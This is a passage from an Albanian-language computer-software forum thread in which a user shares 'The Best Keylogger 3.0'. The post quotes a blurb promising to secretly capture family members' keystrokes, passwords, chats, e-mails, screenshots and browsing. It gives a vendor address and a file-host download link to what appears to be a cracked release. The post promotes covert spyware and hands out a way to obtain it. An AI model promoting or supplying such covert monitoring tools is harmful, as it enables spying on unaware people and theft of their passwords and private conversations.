Pershendetje vizitor i nderuar...
Me sa duket, ju nuk jeni identifikuar akoma ne faqen tone, ndaj po ju paraqitet ky mesazh per tju kujtuar se ju mund te identifikoheni qe te merrni pjese ne
diskutimet dhe temat e shumta te forumit tone.

- Ne qofte se ende nuk keni nje Llogari personale ne forumin ton, mund ta hapni nje te tille duke u Regjistruar
-Regjistrimi eshte falas dhe ju merr koh maksimumi 1 min...

-Gjithsesi ju falenderojme shume, per kohen qe fute ne dispozicion per te n'a vizituar ne ueb-faqen tone.

Me Respekt dhe Kenaqesi:
Staffi i Forumit : Rinia e Ferizajit 
ForumForum  PortaliPortali  CalendarCalendar  GalleryGallery  PytësoriPytësori  KërkoKërko  RegjistrohuRegjistrohu  identifikimiidentifikimi  

Share | 
 

 The Best Keylogger 3.0

Shko poshtë 
AutoriMesazh
ScientisT-BoY
Antar/e
Antar/e


Numri i postimeve : 217
Filloi me : 27/05/2009

MesazhTitulli: The Best Keylogger 3.0   Sat May 30, 2009 3:42 pm
<table align="center" border="0" cellpadding="3" cellspacing="1" width="90%"><tr><td>Quote:</td>
</tr>
<tr><td class="quote">Info:

The Best Keylogger lets you to read your family members chat
conversations, look at their e-mails, and sites they have surfed. By
activating The Best Keylogger, you can monitor everything.The Best KeyLogger allows you to register all keystrokes typed,
including language-specific characters, talk and messages
conversations, passwords, e-mails, clipboard, captured screenshots,
desktop, and Internet activity.

</td>
</tr>
</table>More Info:

<table align="center" border="0" cellpadding="3" cellspacing="1" width="90%"><tr><td>Code:</td>
</tr>
<tr><td class="code">http://thebestkeylogger.mine.nu</td>
</tr>
</table><table align="center" border="0" cellpadding="3" cellspacing="1" width="90%"><tr><td>Code:</td>
</tr>
<tr><td class="code">http://saveqube.com/getfile/03037d5483eb71382c8012f8f488624583003c829cc6896388/The.Best.Keylogger_.v3.0.TeamDXA.rar.html </td>
</tr>
</table>

Mbrapsht në krye Shko poshtë
 
The Best Keylogger 3.0
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Rinia e Ferizajit :: Programe Kompjuterike-
Kërce tek: